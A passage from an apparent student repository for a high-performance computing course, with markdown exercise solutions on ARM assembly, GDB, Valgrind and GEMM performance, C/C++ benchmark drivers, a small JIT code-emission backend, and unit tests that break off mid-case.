"MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "# A New World\n\n\n# GDB and Valgrind\n\n## Assembly code explanation \n\nThe assembly code does the following job: \nFirst it increments the value of the address in register x0 by 8 Byte and loads the value into register x1. \nAfter this it loads the value of address x0 + 8 in register x2 and the value of address x0 + 8 + 8 in register x3 (where +8 stands for +8 Bytes).\nFinally the values of address x0 + 8 + 16 are stored in register x4 and from address x0 + 8 + 16 + 8 in register x5.\n\nWhen used with the function call load_asm(l_a + 2) the address of l_a + 2 * sizeof(uint64_t*) is saved in register x0. Since our Neoverse N1 has a 64 bit architecture the size of a pointer is 8 Byte and therefore the address of the third element (value 300) is saved in register x0. \nExecuting the three statements give us the follwing values for registers x1 to x5\n\nx1 = 400\nx2 = 400\nx3 = 500\nx4 = 600\nx5 = 700\n\n## running GDB\n\nThe values for our 5 registers after executing load_asm step by step\nx0 0x432ec8 4402888\nx1 0x190 400\nx2 0x190 400\nx3 0x1f4 500\nx4 0x258 600\nx5 0x2bc 700\n\n## valgrind\n\nRunning lines 18, 21, and 24 is problematic because we read data outside of our allocated memory. \nThe function call in line 18 makes problems from the beginning because we start to read data 4 * 8 bytes after the last element of l_a. \n\nThe call in line 21 starts fine and reads the last value of l_a into registers x1 and x2, however the second load of the ldp is problematic again (since it exceeds the boundaries of the allocated space). \n\nThe call in line 24 works fine until the last load operation of ldp. \n\n# Copying data\n\nThe written and generated files can be found in the repository. \nWe can observe two things:\n\n(1) the compiler does not unroll loops and produces therefore an overhead for incrementing and comparing the loop counter and jumps\n(2) the generated code manipulates the address registers in extra steps and it loads only one value and not pairs. The reason behind this is probably the added flexibility through the loop. \n\nAs far as I can see there is nearly no difference between the generated and disassembled variant of our copy_c function. Maybe optimization flags would make a difference in terms of loop unrolling. \n" }, { "alpha_fraction": 0.4113389551639557, "alphanum_fraction": 0.4620024263858795, "avg_line_length": 20.256410598754883, "blob_id": "bef8ca7a8e404ceae9bf7482544aacbd2289656c", "content_id": "9e47e168b11a7f2ddff3d68a43017e6ba0bb11c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 829, "license_type": "no_license", "max_line_length": 101, "num_lines": 39, "path": "/exercise_8/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdint>\n\nextern \"C\" \n{\n void sve_example_0(uint32_t * in, uint32_t * out);\n void sve_example_2(uint32_t * in, uint32_t * out);\n}\n\nint main(int argc, char const * argv[]) \n{\n if (argc != 2) \n {\n std::cerr << \"Run: \" << argv[0] << \" <0|2>\" << std::endl;\n return 0;\n }\n int example = atoi(argv[1]);\n\n uint32_t dataIn[128] = {0};\n uint32_t dataOut[128] = {0};\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n dataIn[i] = (i + 1) * 2;\n }\n\n if (example == 0) \n {\n sve_example_0(dataIn, dataOut);\n }\n else if (example == 2)\n {\n sve_example_2(dataIn, dataOut);\n }\n for (unsigned int i = 0; i < 128; ++i)\n {\n std::cout << \"i / in / out: \" << i << \" / \" << dataIn[i] << \" / \" << dataOut[i] << std::endl;\n } \n}\n" }, { "alpha_fraction": 0.5157516002655029, "alphanum_fraction": 0.547254741191864, "avg_line_length": 30.158878326416016, "blob_id": "19edeb08691e504bb4aedc3a5a77e46cca7c3caa", "content_id": "f933d24f28c1c10f796df92c20d36a8c15c42d2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3333, "license_type": "no_license", "max_line_length": 66, "num_lines": 107, "path": "/exercise_9/mini_jit_base/src/instructions/Base.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_INSTRUCTIONS_BASE_H\n#define MINI_JIT_INSTRUCTIONS_BASE_H\n\n#include <cstdint>\n\nnamespace mini_jit {\n namespace instructions {\n class Base;\n }\n}\n\nclass mini_jit::instructions::Base {\n public:\n /**\n * Gets the machine code for the return instruction.\n * \n * @return return instruction.\n **/ \n static uint32_t bRet();\n\n /**\n * Gets the machine code for compare and branch on nonzero.\n *\n * @param i_regGp general purpose register which is compared.\n * @param i_imm19 value of the 19-bit immediate.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t bCbnz( uint8_t i_regGp,\n int32_t i_imm19,\n uint8_t i_size );\n\n /**\n * Gets the machine code for a move.\n *\n * @param i_regGp general purpose register which is set.\n * @param i_imm16 value of the 16-bit immediate.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpMovImm( uint8_t i_regGp,\n uint16_t i_imm16,\n uint8_t i_size );\n\n /**\n * Gets the machine code for a move between registers.\n *\n * @param i_regGpDes general purpose register which is set.\n * @param i_regGpSrc general purpose register source\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpMovReg( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint8_t i_size );\n\n /**\n * Gets the machine code for add immediate.\n *\n * @param i_regGpDes general purpose destination register.\n * @param i_regGpSrc general purpose source register.\n * @param i_imm12 value of the 12-bit immediate.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpAddImm( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint16_t i_imm12,\n uint8_t i_size );\n\n /**\n * Gets the machine code for sub immediate.\n *\n * @param i_regGpDes general purpose destination register.\n * @param i_regGpSrc general purpose source register.\n * @param i_imm12 value of the 12-bit immediate.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpSubImm( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint16_t i_imm12,\n uint8_t i_size );\n\n\n /**\n * Gets the machine code for multiply.\n *\n * @param i_regGpDes general purpose destination register.\n * @param i_regGpSrc1 general purpose source register 1.\n * @param i_regGpSrc1 general purpose source register 2.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpMulReg( uint8_t i_regGpDes,\n uint8_t i_regGpSrc1,\n uint8_t i_regGpSrc2,\n uint8_t i_size );\n};\n\n#endif" }, { "alpha_fraction": 0.3260393738746643, "alphanum_fraction": 0.4310722053050995, "avg_line_length": 34.153846740722656, "blob_id": "50070c613524df66f554e5e37e4f33676f1d19f0", "content_id": "176ed425dd846c1743ba8c4fde122f11d2cfa6a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 457, "license_type": "no_license", "max_line_length": 60, "num_lines": 13, "path": "/exercise_4/src/gemm_compiler_32_32_32_32_32_32.hpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef GEMM_COMPILER_32_32_32_32_32_32_HPP\n#define GEMM_COMPILER_32_32_32_32_32_32_HPP\n\nvoid gemm_compiler_32_32_32_32_32_32_mnk(float const* i_a,\n float const* i_b,\n float* io_c);\n\n\nvoid gemm_compiler_32_32_32_32_32_32_nkm(float const* i_a,\n float const* i_b,\n float* io_c);\n\n#endif\n" }, { "alpha_fraction": 0.49537840485572815, "alphanum_fraction": 0.5106874704360962, "avg_line_length": 28.84482765197754, "blob_id": "c61dad1d04cb973076c4943aea7eaeff0e9c8405", "content_id": "ed95898865236f2fbd7bd49bfb94619b888d656f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3462, "license_type": "no_license", "max_line_length": 110, "num_lines": 116, "path": "/exercise_6/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"../exercise_4/src/util.hpp\"\n#include \"../exercise_4/src/gemm_ref.hpp\"\n\n#include <vector>\n#include <iostream>\n#include <chrono>\n\nextern \"C\"\n{\n void gemm_asm_asimd_16_4_4(float const * i_a,\n float const * i_b,\n float * io_c);\n \n void gemm_asm_asimd_16_4_12(float const * i_a,\n float const * i_b,\n float * io_c);\n}\n\nint main()\n{\n const unsigned int iterations = 100000000;\n unsigned int m = 16;\n unsigned int n = 4;\n unsigned int k = 4;\n \n \n float* A = random_matrix(m, k, m);\n float* B = random_matrix(k, n, k);\n float* C_ref = zero_matrix(m, n, m);\n float* C_kernel = zero_matrix(m, n, m);\n \n gemm_asm_asimd_16_4_4(A, B, C_kernel);\n gemm_ref(A, B, C_ref, m, n, k, m, n, m);\n \n \n std::cout << \"Comparing results...\";\n if (compare_matrices(C_ref, C_kernel, m, n, m, m))\n {\n std::cout << \"passed\";\n }\n else\n {\n std::cout << \"failed\";\n }\n std::cout << std::endl;\n \n \n int flop_gemm = m * n * k * 2;\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_asm_asimd_16_4_4(A, B, C_kernel);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * ((double) iterations) / needed_time.count() << std::endl;\n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_kernel;\n \n std::cout << std::endl << \"#################\" << std::endl << \"16x12x4\" << std::endl;\n \n k = 12;\n A = random_matrix(m, k, m);\n B = random_matrix(k, n, k);\n C_ref = zero_matrix(m, n, m);\n C_kernel = zero_matrix(m, n, m);\n \n gemm_asm_asimd_16_4_12(A, B, C_kernel);\n gemm_ref(A, B, C_ref, m, n, k, m, k, m);\n \n \n std::cout << \"Comparing results...\";\n if (compare_matrices(C_ref, C_kernel, m, n, m, m))\n {\n std::cout << \"passed\";\n }\n else\n {\n std::cout << \"failed\";\n }\n std::cout << std::endl;\n \n \n flop_gemm = m * n * k * 2;\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_asm_asimd_16_4_12(A, B, C_kernel);\n }\n end_time = std::chrono::high_resolution_clock::now();\n needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * ((double) iterations) / needed_time.count() << std::endl;\n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_kernel;\n\n}\n" }, { "alpha_fraction": 0.3631284832954407, "alphanum_fraction": 0.3966480493545532, "avg_line_length": 16.899999618530273, "blob_id": "8cf87b1172283108132170373adcd5484c26849a", "content_id": "bdb538901f8391f6ac5a3c9a21ede19e48834546", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 179, "license_type": "no_license", "max_line_length": 40, "num_lines": 10, "path": "/exercise_5/task3/copy.c", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <stdint.h>\n\nvoid copy_c(uint32_t const * i_a,\n uint64_t * o_b)\n{\n for (unsigned int i = 0; i < 7; ++i)\n {\n *(o_b + i) = *(i_a + i);\n }\n}\n" }, { "alpha_fraction": 0.4936569333076477, "alphanum_fraction": 0.514340877532959, "avg_line_length": 29.21666717529297, "blob_id": "05891db467200f3338478055f1d0745a3f3e4019", "content_id": "1d1230616cd08fc81cfd2f7b1f83917a592c6bb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3626, "license_type": "no_license", "max_line_length": 116, "num_lines": 120, "path": "/exercise_7/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"../exercise_4/src/util.hpp\"\n#include \"../exercise_4/src/gemm_ref.hpp\"\n\n#include <vector>\n#include <iostream>\n#include <chrono>\n\nextern \"C\"\n{\n void gemm_asm_asimd_19_4_4(float const * i_a,\n float const * i_b,\n float * io_c);\n \n void gemm_asm_asimd_32_32_32(float const * i_a,\n float const * i_b,\n float * io_c);\n}\n\nint main()\n{\n const unsigned int iterations = 100000000;\n const unsigned int iterations_large = 1000000;\n unsigned int m = 19;\n unsigned int n = 4;\n unsigned int k = 4;\n \n \n float* A = random_matrix(m, k, m);\n float* B = random_matrix(k, n, k);\n float* C_ref = zero_matrix(m, n, m);\n float* C_kernel = zero_matrix(m, n, m);\n \n gemm_asm_asimd_19_4_4(A, B, C_kernel);\n gemm_ref(A, B, C_ref, m, n, k, m, n, m);\n \n std::cout << \"19x4x4\" << std::endl;\n \n std::cout << \"Comparing results...\";\n if (compare_matrices(C_ref, C_kernel, m, n, m, m, 1.0e-6f, true))\n {\n std::cout << \"passed\";\n }\n else\n {\n std::cout << \"failed\";\n }\n std::cout << std::endl;\n \n \n int flop_gemm = m * n * k * 2;\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_asm_asimd_19_4_4(A, B, C_kernel);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * ((double) iterations) / needed_time.count() << std::endl;\n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_kernel;\n \n std::cout << std::endl << \"#################\" << std::endl << \"32x32x32\" << std::endl;\n \n m = 32;\n n = 32;\n k = 32;\n A = random_matrix(m, k, m);\n B = random_matrix(k, n, k);\n C_ref = zero_matrix(m, n, m);\n C_kernel = zero_matrix(m, n, m);\n \n gemm_asm_asimd_32_32_32(A, B, C_kernel);\n gemm_ref(A, B, C_ref, m, n, k, m, k, m);\n \n \n std::cout << \"Comparing results...\";\n if (compare_matrices(C_ref, C_kernel, m, n, m, m))\n {\n std::cout << \"passed\";\n }\n else\n {\n std::cout << \"failed\";\n }\n std::cout << std::endl;\n \n \n flop_gemm = m * n * k * 2;\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations_large; ++i) \n {\n gemm_asm_asimd_32_32_32(A, B, C_kernel);\n }\n end_time = std::chrono::high_resolution_clock::now();\n needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations_large << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations_large << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * ((double) iterations_large) / needed_time.count() << std::endl;\n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_kernel;\n \n}\n" }, { "alpha_fraction": 0.5394446849822998, "alphanum_fraction": 0.5478184223175049, "avg_line_length": 23.94505500793457, "blob_id": "5fb97b8c02e34d1c823d54b9a134c53d06bc5e49", "content_id": "028d5876eade3e13b8cbb164cefd437e3d46d77e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2269, "license_type": "no_license", "max_line_length": 75, "num_lines": 91, "path": "/exercise_9/mini_jit_base/src/backend/Kernel.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Kernel.h\"\n#include <sys/mman.h>\n#include <unistd.h>\n#include <cassert>\n#include <iostream>\n#include <fstream>\n\nmini_jit::backend::Kernel::~Kernel() {\n free();\n}\n\nvoid * mini_jit::backend::Kernel::allocMmap( std::size_t i_nBytes ) const {\n void* l_mem = mmap( 0,\n i_nBytes,\n PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS,\n -1,\n 0 );\n\n return l_mem;\n}\n\nvoid mini_jit::backend::Kernel::freeMmap( std::size_t i_nBytes,\n void * i_mem ) const {\n munmap( i_mem,\n i_nBytes );\n}\n\nvoid mini_jit::backend::Kernel::setExecutable( std::size_t i_nBytes,\n void * i_mem ) const {\n mprotect( i_mem,\n i_nBytes,\n PROT_READ | PROT_EXEC );\n}\n\nvoid mini_jit::backend::Kernel::addInstruction( uint32_t i_ins ) {\n m_codeBuffer.push_back( i_ins );\n m_offset += 4;\n}\n\nvoid mini_jit::backend::Kernel::resetOffset() {\n m_offset = 0;\n}\n\nuint32_t mini_jit::backend::Kernel::getOffset() {\n return m_offset;\n}\n\nuint32_t mini_jit::backend::Kernel::getSize() {\n return m_codeBuffer.size() * 4;\n}\n\nvoid mini_jit::backend::Kernel::setKernel() {\n // alloc mempage\n m_sizeKernel = getpagesize();\n assert( m_sizeKernel >= m_codeBuffer.size()/4 );\n m_kernel = (uint32_t*) allocMmap( m_sizeKernel );\n\n // copy machine code over\n for( std::size_t l_in = 0; l_in < m_codeBuffer.size(); l_in++ ) {\n m_kernel[l_in] = m_codeBuffer[l_in];\n }\n\n // set executable\n setExecutable( m_sizeKernel,\n m_kernel );\n}\n\nvoid const * mini_jit::backend::Kernel::getKernel() const {\n return m_kernel;\n}\n\nvoid mini_jit::backend::Kernel::free() {\n m_codeBuffer.resize( 0 );\n if( m_kernel != nullptr ) {\n freeMmap( m_sizeKernel,\n m_kernel );\n }\n m_sizeKernel = 0;\n}\n\nvoid mini_jit::backend::Kernel::write( char const *i_path ) const {\n std::ofstream l_out ( i_path,\n std::ios::out | std::ios::binary );\n if( !l_out ) {\n std::cerr << \"error: failed to open file: \" << i_path << std::endl;\n return;\n }\n l_out.write( (char*) m_codeBuffer.data(),\n m_codeBuffer.size()*4 );\n}" }, { "alpha_fraction": 0.31972789764404297, "alphanum_fraction": 0.646258533000946, "avg_line_length": 36, "blob_id": "1088e68a79ef278cbda9d27891069ec383227572", "content_id": "26017a894a9df848a19c2448a94add89ac33a037", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 147, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/exercise_7/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "Kernel | time (s) | #executions | GFLOPS | %peak\n\nMarkus 19x4x4 | 3.161 | 100000000 | 19.23 | 0.48\nMarkus 32x32x32 | 1.739 | 1000000 | 37.67 | 0.94" }, { "alpha_fraction": 0.724863588809967, "alphanum_fraction": 0.7552611231803894, "avg_line_length": 36.735294342041016, "blob_id": "78d35a8a69012532811e5706deffdcfb9e134147", "content_id": "95dce33bb0354a6aa613288e16a20fde55d9e1b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1283, "license_type": "no_license", "max_line_length": 194, "num_lines": 34, "path": "/exercise_4/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "## Task 4.1 \n\nCompiling and executing test (Note to myself: makefile!):\n\ng++ -o gemm_ref_test src/gemm_ref_test.cpp src/gemm_ref.cpp src/util.cpp\n\nTest passed\n\n## Task 4.2 and 4.3\n\nExpected floating point operations:\n\nFor C_{i,j} we have to multiply k times and add k - 1 times. Total: 2k - 1 Operations\n\nC has m \\cdot n entrys. Therefor the total number of floating point operations is: mn(2k -1).\n\n\nCompiling: \n\ng++ -O{i} -o driver_O{i} src/driver.cpp src/gemm_ref.cpp src/util.cpp src/gemm_compiler_32_32_32_32_32_32.cpp\n\ni \\in {0, 2, 3}\n\nNote: I'm not printing GFLOPS to the command line but FLOPS. Wrong in the result log file. \n\nPerformance for no optimization: \nFor the reference kernel we get roughly 3e+8 FLOPS (0.3 GFLOPS).\nThe optimized kernel has a performance of ~0.4 GFLOPS\n\nOptimization level 2 increases the performance of the reference kernel to 2 GFLOPS where the optimized kernel reaches ~2.3 GFLOPS\n\nAt optimization level 3 the performance of the reference kernel increases slightly to 2.2 GFLOPS where the performance of the optimized kernel stays nearly the same. \n\nHowever, comparing the mnk and the nkm version of the kernel the latter one perform slightly better. The reason for this might be the usage of the cache and a better locality of the nkm version.\n" }, { "alpha_fraction": 0.44891121983528137, "alphanum_fraction": 0.4539363384246826, "avg_line_length": 27.428571701049805, "blob_id": "738bb001d646d230f0048968b0a144db1bfe3fa5", "content_id": "6382a5cd1693d654c69546d031e6e5b4fa3685e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 597, "license_type": "no_license", "max_line_length": 42, "num_lines": 21, "path": "/exercise_4/src/util.hpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef UTIL_HPP\n#define UTIL_HPP\n\nbool compare_matrices(float const* i_a,\n float const* i_b,\n unsigned int i_m,\n unsigned int i_n,\n unsigned int i_lda,\n unsigned int i_ldb,\n float eps = 1.0e-6f,\n\t\t bool verbose = false);\n\nfloat* random_matrix(unsigned int i_m, \n unsigned int i_n, \n unsigned int i_ld);\n\nfloat* zero_matrix(unsigned int i_m,\n unsigned int i_n,\n unsigned int i_ld);\n\n#endif\n" }, { "alpha_fraction": 0.36097562313079834, "alphanum_fraction": 0.3658536672592163, "avg_line_length": 23.600000381469727, "blob_id": "7ab19e7cd2c4c11fd1799c0a62af62455424a196", "content_id": "9103cf46cd056f074603c8226bafa3466a123da3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 615, "license_type": "no_license", "max_line_length": 85, "num_lines": 25, "path": "/exercise_4/src/gemm_ref.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"gemm_ref.hpp\"\n\n#include <cstddef>\n\nvoid gemm_ref(float const* i_a,\n float const* i_b,\n float * io_c,\n unsigned int i_m,\n unsigned int i_n,\n unsigned int i_k,\n unsigned int i_lda,\n unsigned int i_ldb,\n unsigned int i_ldc) \n{\n for (size_t m = 0; m < i_m; ++m) \n {\n for (size_t n = 0; n < i_n; ++n)\n {\n for (size_t k = 0; k < i_k; ++k)\n {\n io_c[(i_ldc * n) + m] += i_a[(i_lda * k) + m] * i_b[(i_ldb * n) + k];\n }\n }\n }\n}\n" }, { "alpha_fraction": 0.5409760475158691, "alphanum_fraction": 0.5474217534065247, "avg_line_length": 18.935779571533203, "blob_id": "6652c9ec999bbf0b7866ed6fdc235f61b51f735e", "content_id": "f3e6309748bdb1e6900b45984ef6c7ef4f267913", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2172, "license_type": "no_license", "max_line_length": 57, "num_lines": 109, "path": "/exercise_9/mini_jit_base/src/backend/Kernel.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cstdint>\n#include <vector>\n#include <string>\n\n#ifndef MINI_JIT_BACKEND_KERNEL_H\n#define MINI_JIT_BACKEND_KERNEL_H\n\nnamespace mini_jit {\n namespace backend {\n class Kernel;\n }\n}\n\nclass mini_jit::backend::Kernel {\n private:\n //! high-level code buffer\n std::vector< uint32_t > m_codeBuffer;\n\n //! size of the kernel\n std::size_t m_sizeKernel = 0;\n\n //! executable kernel\n uint32_t * m_kernel = nullptr;\n\n //! instruction-offset in bytes since last reset\n uint32_t m_offset = 0;\n\n /**\n * Allocates memory through POSIX mmap.\n *\n * @param i_nBytes number of bytes.\n **/\n void * allocMmap( std::size_t i_nBytes ) const;\n\n /**\n * Frees POSIX mmap allocated memory.\n *\n * @param i_nBytes number of bytes.\n * @param i_mem pointer to memory which is freed.\n **/\n void freeMmap( std::size_t i_nBytes,\n void * i_mem ) const;\n \n /**\n * Sets the given memory region executable.\n *\n * @param i_nBytes number of bytes.\n * @param i_mem point to memory.\n **/\n void setExecutable( std::size_t i_nBytes,\n void * i_mem ) const;\n\n /**\n * Frees the code buffer and frees the kernel if set.\n **/\n void free();\n\n public:\n /**\n * Destructor\n **/\n ~Kernel();\n\n /**\n * Adds an instruction to the code buffer.\n *\n * @param i_ins instruction which is added.\n **/\n void addInstruction( uint32_t i_ins );\n\n /**\n * Resets the offset\n **/\n void resetOffset();\n\n /**\n * Gets the offset.\n *\n * @return offset in byte since last reset.\n **/\n uint32_t getOffset();\n\n /**\n * Gets the size of the kernel.\n *\n * @return size of the generated code in byte.\n **/\n uint32_t getSize();\n\n /**\n * Sets the kernel based on the code buffer.\n **/\n void setKernel();\n\n /**\n * Gets a pointer to the kernel.\n **/\n void const * getKernel() const;\n\n\n /**\n * Writs the code buffer to the given file.\n *\n * @param i_path path to the file.\n **/\n void write( char const *i_path ) const;\n};\n\n#endif" }, { "alpha_fraction": 0.6395147442817688, "alphanum_fraction": 0.6481802463531494, "avg_line_length": 19.64285659790039, "blob_id": "135975d053c8d62e8cf11652e3b9943d564775ce", "content_id": "4803df9670d3c8e4da94d18157e77a80cce43760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 577, "license_type": "no_license", "max_line_length": 61, "num_lines": 28, "path": "/exercise_9/mini_jit_base/src/generators/Loop.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_GENERATORS_LOOP_H\n#define MINI_JIT_GENERATORS_LOOP_H\n\n#include \"../backend/Kernel.h\"\n#include \"../instructions/Base.h\"\n\nnamespace mini_jit {\n namespace generators {\n class Loop;\n }\n}\n\nclass mini_jit::generators::Loop {\n private:\n //! kernel backend\n backend::Kernel m_kernel;\n \n public:\n /**\n * Generates a kernel which increments x0 through a loop.\n *\n * @param i_nIterations number of iterations in the loop.\n * @return function pointer to kernel.\n **/\n uint32_t ( *generate( uint32_t i_nIterations ) )();\n};\n\n#endif" }, { "alpha_fraction": 0.25414156913757324, "alphanum_fraction": 0.4518072307109833, "avg_line_length": 35.38356018066406, "blob_id": "f317a3401f52e2fff11ab71d92476bbde1f186da", "content_id": "d441e012f2bef59716ad9ec96c98852a9b34d058", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2656, "license_type": "no_license", "max_line_length": 102, "num_lines": 73, "path": "/exercise_4/src/gemm_ref_test.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#define CATCH_CONFIG_MAIN \n#include \"catch.hpp\"\n#include \"gemm_ref.hpp\"\n#include \"util.hpp\"\n\n\nTEST_CASE( \"Matrices are compared\", \"[compare_matrices]\" ) \n{\n float eye[9] = {1, 0, 0, 0, 1, 0, 0, 0, 1};\n float a[20] = {1, 2, 3, 4, 42, 5, 6, 7, 8, 42, 9, 10, 11, 12, 42, 13, 14, 15, 16, 42};\n float b[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};\n float c[16] = {2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17};\n \n REQUIRE(compare_matrices(eye, eye, 3, 3, 3, 3));\n REQUIRE(compare_matrices(a, a, 4, 4, 5, 5));\n REQUIRE(compare_matrices(b, b, 4, 4, 4, 4));\n REQUIRE(compare_matrices(a, b, 4, 4, 5, 4));\n REQUIRE(compare_matrices(a, c, 4, 4, 5, 4) == false);\n REQUIRE(compare_matrices(b, c, 4, 4, 4, 4) == false);\n}\n\nTEST_CASE( \"GEMM reference kernel\" \"[gemm_ref]\")\n{\n // CASE 1\n float c_1[9] = {1, 0, 0, 0, 1, 0, 0, 0, 1};\n float a_1[12] = {1, 4, 7, 25, 2, 5, 8, 25, 3, 6, 9, 25};\n float b_1[9] = {2, 8, 14, 4, 10, 16, 6, 12, 18};\n \n float c_1_res[9] = {61, 132, 204, 72, 163, 252, 84, 192, 301};\n \n gemm_ref(a_1, b_1, c_1, 3, 3, 3, 4, 3, 3); \n REQUIRE(compare_matrices(c_1_res, c_1, 3, 3, 3, 3));\n \n // CASE 2\n float c_2[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};\n float a_2[16] = {2, 0, 0, 0, 0, 2, 0, 0, 0, 0, 2, 0, 0, 0, 0, 2};\n float b_2[16] = {3, 0, 0, 0, 0, 3, 0, 0, 0, 0, 3, 0, 0, 0, 0, 3};\n \n float c_2_res[16] = {6, 0, 0, 0, 0, 6, 0, 0, 0, 0, 6, 0, 0, 0, 0, 6};\n \n gemm_ref(a_2, b_2, c_2, 4, 4, 4, 4, 4, 4);\n REQUIRE(compare_matrices(c_2, c_2_res, 4, 4, 4, 4));\n \n // CASE 3\n float c_3[20] = {2, 0, 0, 0, 24, 0, 2, 0, 0, 42, 0, 0, 2, 0, 42, 0, 0, 0, 2, 42};\n float a_3[24] = {3, 0, 0, 0, 52, 67, 0, 3, 0, 0, 215, 123, 0, 0, 3, 0, 5, 24, 0, 0, 0, 3, 42, 42};\n float b_3[16] = {1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1};\n \n float c_3_res[16] = {5, 0, 0, 0, 0, 5, 0, 0, 0, 0, 5, 0, 0, 0, 0, 5};\n \n gemm_ref(a_3, b_3, c_3, 4, 4, 4, 6, 4, 5);\n REQUIRE(compare_matrices(c_3, c_3_res, 4, 4, 5, 4));\n \n // CASE 4\n float c_4[9] = {0, 0, 0, 0, 0, 0, 0, 0, 0};\n float a_4[3] = {1, 2, 3};\n float b_4[3] = {1, 2, 3};\n \n float c_4_res[9] = {1, 2, 3, 2, 4, 6, 3, 6, 9};\n \n gemm_ref(a_4, b_4, c_4, 3, 3, 1, 